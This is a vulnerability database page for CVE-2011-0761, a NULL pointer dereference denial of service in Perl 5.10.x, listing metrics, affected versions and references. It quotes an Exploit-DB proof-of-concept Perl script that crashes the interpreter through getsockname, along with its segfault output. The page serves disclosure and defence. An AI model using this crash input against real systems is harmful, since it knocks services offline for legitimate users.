CVE-2011-0761 : Detail

CVE-2011-0761

1.68%V3
Network
2011-05-13
15h00 +00:00
2018-10-09
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Perl 5.10.x allows context-dependent attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an ability to inject arguments into a (1) getpeername, (2) readdir, (3) closedir, (4) getsockname, (5) rewinddir, (6) tell, or (7) telldir function call.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 35725

Publication date : 2011-05-02 22h00 +00:00
Author : Jonathan Brossard
EDB Verified : Yes

source: https://www.securityfocus.com/bid/47766/info Perl is prone to multiple denial-of-service vulnerabilities caused by a NULL-pointer dereference. An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users. Perl versions 5.10.x are vulnerable. jonathan () blackbox:~/test$ cat poc1.pl #!/usr/bin/perl $a = getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792); jonathan () blackbox:~/test$ perl poc1.pl Segmentation fault (core dumped) jonathan () blackbox:~/test$

Products Mentioned

Configuraton 0

Perl>>Perl >> Version 5.10.0

Perl>>Perl >> Version 5.10.0

Perl>>Perl >> Version 5.10.0

Perl>>Perl >> Version 5.10.1

Perl>>Perl >> Version 5.10.1

Perl>>Perl >> Version 5.10.1

References

http://securityreason.com/securityalert/8248
Tags : third-party-advisory, x_refsource_SREASON
http://securitytracker.com/id?1025507
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/47766
Tags : vdb-entry, x_refsource_BID